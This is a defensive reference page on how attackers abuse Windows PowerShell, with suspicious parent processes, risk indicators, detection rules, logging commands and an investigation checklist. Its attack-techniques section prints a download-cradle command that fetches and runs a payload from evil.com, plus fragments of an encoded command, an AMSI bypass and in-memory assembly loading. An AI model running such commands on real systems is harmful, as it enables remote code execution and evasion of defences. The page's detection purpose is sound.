Critical RiskWindowsLegitimateCommonly Abused
powershell.exeSYSTEM UTILITYpowershell.exe - Windows PowerShell Security Analysis
powershell.exe is the **Windows PowerShell** scripting engine. It is the **#1 attack tool** used by threat actors for execution, download cradles, post-exploitation, and living-off-the-land attacks. Extensive logging and monitoring is essential.
Risk Summary
CRITICAL priority. PowerShell is the most abused Windows utility. Enable **ScriptBlock Logging** and **Transcription**. Monitor for: encoded commands, download cradles, AMSI bypass, and suspicious parent processes.
Overview
What is powershell.exe?
powershell.exe is the Windows PowerShell scripting engine.
Security Significance
- #1 Attack Tool: Used in majority of attacks
- Full .NET Access: Complete system access
- Download Cradle: Downloads and executes payloads
- Fileless Attacks: Executes entirely in memory
- AMSI Integration: Anti-Malware Scan Interface
Normal Behavior
Normal Behavior
Expected Parents
| Parent | Context |
|---|---|
| explorer.exe | User launches |
| cmd.exe | Script execution |
| services.exe | Admin scripts |
| svchost.exe | Scheduled tasks |
Suspicious Parents
| Parent | Risk |
|---|---|
| winword.exe | CRITICAL |
| excel.exe | CRITICAL |
| outlook.exe | CRITICAL |
| mshta.exe | CRITICAL |
| wscript.exe | HIGH |
Common Locations
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSuspicious Indicators
Legitimate vs Suspicious
CRITICAL INDICATORS
-EncodedCommand / -enc / -e
-ExecutionPolicy Bypass / -ep bypass
-NoProfile -NonInteractive
-WindowStyle Hidden / -w hidden
Invoke-Expression / IEX
DownloadString / DownloadFile
Net.WebClient
[Convert]::FromBase64String
New-Object IO.MemoryStream
Invoke-Mimikatz
Risk Assessment
| Pattern | Risk Level |
|---|---|
| -enc [base64] | CRITICAL |
| IEX(Net.WebClient) | CRITICAL |
| Invoke-Mimikatz | CRITICAL |
| AMSI bypass attempt | CRITICAL |
| -ExecutionPolicy Bypass | HIGH |
| -WindowStyle Hidden | MEDIUM |
Abuse Techniques
Attack Techniques
Technique #1: Download Cradle (T1059.001)
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"
Technique #2: Encoded Commands
powershell -enc JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAA...
Technique #3: AMSI Bypass
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils")...
Technique #4: Fileless Malware
$bytes = [Convert]::FromBase64String($encoded)
[System.Reflection.Assembly]::Load($bytes)
Detection Guidance
Detection Strategies
Enable Logging
# ScriptBlock Logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1
# Transcription
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" -Name "EnableTranscripting" -Value 1
Detection Rules
Rule #1: Encoded Command
CommandLine MATCHES "-e(nc|ncodedcommand)?"
→ ALERT: CRITICAL
Rule #2: Download Cradle
CommandLine CONTAINS "DownloadString" OR "WebClient"
→ ALERT: CRITICAL
Rule #3: Suspicious Parent
Parent IN ("winword.exe", "excel.exe") AND Process = "powershell.exe"
→ ALERT: CRITICAL
Remediation Steps
Remediation
- Enable PowerShell logging organization-wide
- Decode and analyze encoded commands
- Block PowerShell for non-admin users (Constrained Language Mode)
- Implement Application Control
- Deploy AMSI-aware security solutions
Investigation Checklist
Investigation Checklist
- Capture full command line
- Decode encoded commands
- Review ScriptBlock logs (Event ID 4104)
- Check parent process
- Look for download activity
- Check AMSI logs for bypasses
- Review network connections
- Check persistence mechanisms
MITRE ATT&CK Techniques
Last verified: January 18, 2026